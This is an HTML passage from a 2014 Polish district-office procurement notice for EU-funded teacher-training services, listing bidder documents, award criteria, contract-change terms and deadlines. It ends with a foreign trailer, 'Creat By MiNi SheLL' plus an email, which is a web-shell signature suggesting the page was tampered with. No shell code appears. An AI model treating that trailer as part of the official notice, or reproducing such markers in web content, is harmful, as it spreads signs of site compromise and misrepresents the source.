<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie w realizacji usług polegających na prowadzeniu form doskonalenia - 25</li>
<li>3 - Kryterium jakościowe - akredytacja lub ISO - 25</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany umowy:
1.Zmiana osoby wskazanej w ofercie w przypadku wystąpienia sytuacji losowych udokumentowanych przez Wykonawcę tylko i wyłącznie za pisemna zgodą Zamawiającego. Osoba jak powyżej musi spełniać wymagania określone w SIWZ
2. Zmiana terminu zakończenia umowy w przypadku: rozwiązania umowy lub zaprzestania finansowania przez instytucje pośredniczą, zmiany harmonogramu realizacji projektu będącego załącznikiem do umowy o dofinansowanie
3. Jeżeli zmianie ulegną wytyczne/dokumenty odnoszące się do realizacji projektów w ramach POKL lub Lider Partnerstwa przekaże nowe wytyczne regulujące prowadzenie zajęć w ramach Projektu.
4. Jeżeli zaistnieją jakiekolwiek okoliczności, których Zamawiający ani Wykonawca nie mogli przewidzieć w chwili podpisania umowy, a które mogą mieć wpływ na realizację Projektu.
5. Zmiana terminu realizacji zamówienia z uwagi na rezygnację lub zapotrzebowanie  i możliwości uczestników projektu oraz potrzebę przesunięć organizacyjnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.oswiecim.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Oświęcimiu, ul. Wyspiańskiego 10, 32-602 Oświęcim.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2014 godzina 12:00, miejsce: Oferty muszą być złożone w siedzibie zamawiającego w Oświęcimiu przy ul. St. Wyspiańskiego 10, Dziennik Podawczy - pok. 12 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet III. Wysoka jakość systemu oświaty, Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół System doskonalenia nauczycieli oparty na ogólnodostępnym, kompleksowym wspomaganiu szkół CZŁOWIEK - NAJLEPSZA INWESTYCJA..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com